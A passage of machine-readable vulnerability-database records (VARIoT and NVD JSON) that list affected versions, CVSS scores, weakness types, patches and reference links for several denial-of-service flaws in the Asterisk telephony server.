"id": "SB2019112218",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-01312",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"id": "VAR-201911-1367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
}
]
},
"last_update_date": "2023-12-18T12:27:54.815000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2019-008",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Code Issue Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/196675"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104688"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://seclists.org/fulldisclosure/2019/nov/20"
},
{
"trust": 2.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 2.2,
"url": "https://packetstormsecurity.com/files/155436/asterisk-project-security-advisory-ast-2019-008.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2019112218?affchecked=1"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18976"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18976"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-denial-of-service-via-t-38-sdp-re-invite-30937"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.diff"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28612"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/.pdf"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/.html"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.21.diff"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"db": "PACKETSTORM",
"id": "155436"
},
{
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"date": "2019-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"date": "2019-11-21T23:55:55",
"db": "PACKETSTORM",
"id": "155436"
},
{
"date": "2019-11-22T17:15:11.833000",
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-01312"
},
{
"date": "2019-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012748"
},
{
"date": "2022-06-03T14:41:01.313000",
"db": "NVD",
"id": "CVE-2019-18976"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012748"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1292"
}
],
"trust": 0.6
}
}
VAR-201806-0745
Vulnerability from variot - Updated: 2023-12-18 12:18An issue was discovered in Asterisk Open Source 15.x before 15.4.1. When connected to Asterisk via TCP/TLS, if the client abruptly disconnects, or sends a specially crafted message, then Asterisk gets caught in an infinite loop while trying to read the data stream. This renders the system unusable. Asterisk Open Source Contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsteriskOpenSource is an open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in the 15.x version prior to DigiumAsteriskOpenSource 15.4.1. Attackers can exploit this issue to crash the application, resulting in a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201806-0745",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "open source",
"scope": "lt",
"trust": 1.0,
"vendor": "asterisk",
"version": "15.4.1"
},
{
"model": "open source",
"scope": "gte",
"trust": 1.0,
"vendor": "asterisk",
"version": "15.0"
},
{
"model": "open source",
"scope": "lt",
"trust": 0.8,
"vendor": "asterisk",
"version": "15.x"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.8,
"vendor": "asterisk",
"version": "15.4.1"
},
{
"model": "asterisk open source",
"scope": "eq",
"trust": 0.6,
"vendor": "digium",
"version": "15.*\u003c15.4.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.2.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.2.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.1.4"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.1.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.1.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.1.5"
},
{
"model": "open source",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.1.2"
},
{
"model": "open source",
"scope": "ne",
"trust": 0.3,
"vendor": "asterisk",
"version": "15.4.1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"db": "BID",
"id": "104457"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "NVD",
"id": "CVE-2018-12228"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:asterisk:open_source:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "15.4.1",
"versionStartIncluding": "15.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-12228"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sean Bright",
"sources": [
{
"db": "BID",
"id": "104457"
}
],
"trust": 0.3
},
"cve": "CVE-2018-12228",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 6.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-12228",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-12156",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-12228",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-12228",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-12156",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201806-749",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "NVD",
"id": "CVE-2018-12228"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in Asterisk Open Source 15.x before 15.4.1. When connected to Asterisk via TCP/TLS, if the client abruptly disconnects, or sends a specially crafted message, then Asterisk gets caught in an infinite loop while trying to read the data stream. This renders the system unusable. Asterisk Open Source Contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsteriskOpenSource is an open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in the 15.x version prior to DigiumAsteriskOpenSource 15.4.1. \nAttackers can exploit this issue to crash the application, resulting in a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-12228"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"db": "BID",
"id": "104457"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-12228",
"trust": 3.3
},
{
"db": "BID",
"id": "104457",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-12156",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201806-749",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"db": "BID",
"id": "104457"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "NVD",
"id": "CVE-2018-12228"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
]
},
"id": "VAR-201806-0745",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
}
]
},
"last_update_date": "2023-12-18T12:18:48.182000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2018-007",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2018-007.html"
},
{
"title": "ASTERISK-27807",
"trust": 0.8,
"url": "https://issues.asterisk.org/jira/browse/asterisk-27807"
},
{
"title": "Patch for DigiumAsteriskOpenSource Remote Authentication Session Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132899"
},
{
"title": "Digium Asterisk Open Source Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=80913"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-835",
"trust": 1.0
},
{
"problemtype": "CWE-287",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "NVD",
"id": "CVE-2018-12228"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://downloads.asterisk.org/pub/security/ast-2018-007.html"
},
{
"trust": 1.9,
"url": "https://issues.asterisk.org/jira/browse/asterisk-27807"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/104457"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12228"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12228"
},
{
"trust": 0.3,
"url": "http://www.asterisk.org/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"db": "BID",
"id": "104457"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "NVD",
"id": "CVE-2018-12228"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"db": "BID",
"id": "104457"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"db": "NVD",
"id": "CVE-2018-12228"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"date": "2018-06-11T00:00:00",
"db": "BID",
"id": "104457"
},
{
"date": "2018-08-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"date": "2018-06-12T04:29:00.330000",
"db": "NVD",
"id": "CVE-2018-12228"
},
{
"date": "2018-06-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12156"
},
{
"date": "2018-06-11T00:00:00",
"db": "BID",
"id": "104457"
},
{
"date": "2018-08-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006656"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-12228"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk Open Source Authentication vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006656"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-749"
}
],
"trust": 0.6
}
}
CVE-2023-49786 (GCVE-0-2023-49786)
Vulnerability from nvd – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18- CWE-703 - Improper Check or Handling of Exceptional Conditions
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:01:25.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-49786",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-08T14:19:55.907894Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-08T14:20:19.222Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:18.647Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
